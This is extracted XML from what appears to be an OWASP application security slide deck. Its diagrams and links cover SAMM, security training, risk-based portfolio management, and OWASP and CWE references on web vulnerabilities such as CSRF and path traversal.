            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>. This model helps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2047435" y="3180434"/>
        <a:ext cx="5570583" cy="697569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3DD3F871-F853-40F1-B9BB-E34640B0706D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1107245" y="3046067"/>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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Secure Development Lifecycle</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1153141" y="3091963"/>
        <a:ext cx="848397" cy="874511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8CBD60D3-72A4-4313-88D7-1B4D28AA9E08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4465073" y="1739677"/>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baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>The </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>OWASP Education Project</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t> provides training materials to help educate developers on web application security and has compiled a large list of </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>OWASP Educational Presentations</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>. For hands-on learning about vulnerabilities, try </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>OWASP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>WebGoat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>. To stay current, come to an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>OWASP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>AppSec</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t> Conference</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, OWASP Conference Training, or local </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>OWASP Chapter meetings</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2047435" y="4195053"/>
        <a:ext cx="5570583" cy="697569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{573CF2CD-94C3-4404-8E22-47B8390B5477}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1107245" y="4060686"/>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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Application Security Education</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1153141" y="4106582"/>
        <a:ext cx="848397" cy="87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314627" y="-2191458"/>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smtClean="0"/>
            <a:t>Conduct </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>your peers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>define </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>key </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>improvement areas and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>an execution </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>plan. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Gain </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>management approval and establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>application security awareness </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>campaign</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> for the entire IT </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>organization.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2003362" y="165549"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2678"/>
          <a:ext cx="909184"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smtClean="0"/>
            <a:t>Get Started</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138560" y="47061"/>
        <a:ext cx="820418" cy="1082511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="-961617"/>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Identify and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>prioritize your application portfolio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> from an inherent risk perspective. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Create an application risk profiling model to measure and prioritize the applications in your portfolio.  Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Establish a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>common risk rating model</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="1395390"/>
        <a:ext cx="5513810" cy="845537"/>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Risk Based Portfolio Approach</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="1278353"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="268223"/>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Establish a set of focused </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>policies and standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> that provide an application security baseline for all development teams to adhere to.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Define a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>common set of reusable security controls</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> that complement these policies and standards and provide design and development guidance on their use.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>application security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> that is required and targeted to different development roles and topics.  </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="2625230"/>
        <a:ext cx="5513810" cy="845537"/>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Enable with a Strong Foundation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="2508194"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="1498065"/>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Define and integrate </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>security implementation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>verification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> activities into existing development and operational processes.  Activities include </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>Threat Modeling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, Secure Design &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, Secure Code &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>Pen Testing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, Remediation, etc.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Provide subject matter experts and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> to be successful.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="3855072"/>
        <a:ext cx="5513810" cy="845537"/>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Integrate Security  into Existing Processes</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="3738035"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="2727906"/>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Manage with metrics.  Drive improvement and funding decisions based on the metrics and analysis data captured.  Metrics include adherence to security practices / activities, vulnerabilities introduced, vulenerabilities mitigated, application coverage, etc.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="5084913"/>
        <a:ext cx="5513810" cy="845537"/>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Provide Management Visibility</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="4967876"/>
        <a:ext cx="847227" cy="10796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75393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/25/2013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254531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we squeeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a mention of ‘parameter tampering’?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It would also be nice to mention query constraints as a defense but maybe that’s too esoteric.</a:t>
            </a:r>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accent1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx2"/>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smtClean="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accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enter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hyperlink" Target="http://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI" TargetMode="Externa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hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/org/owasp/esapi/AccessReferenceMap.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html"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www.owasp.org/index.php/Command_Injec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owasp.org/index.php/CSRFGuard" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/352.html" TargetMode="Externa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hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/CSRFTester" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/CSRF" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI"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owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="Externa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hyperlink" Target="http://www.owasp.org/index.php/Error_Handling"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www.owasp.org/index.php/Configuration" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ASVS"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www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cisecurity.org/en-us/?route=downloads.benchmark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wasp.org/index.php/Guide_to_Cryptography" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encryptor.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="Externa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hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html"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310.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Codereview-Cryptography"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owasp.org/index.php/Forced_browsing" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Testing_for_Path_Traversal" TargetMode="Externa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hyperlink" Target="http://www.owasp.org/index.php/Guide_to_Authorization" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 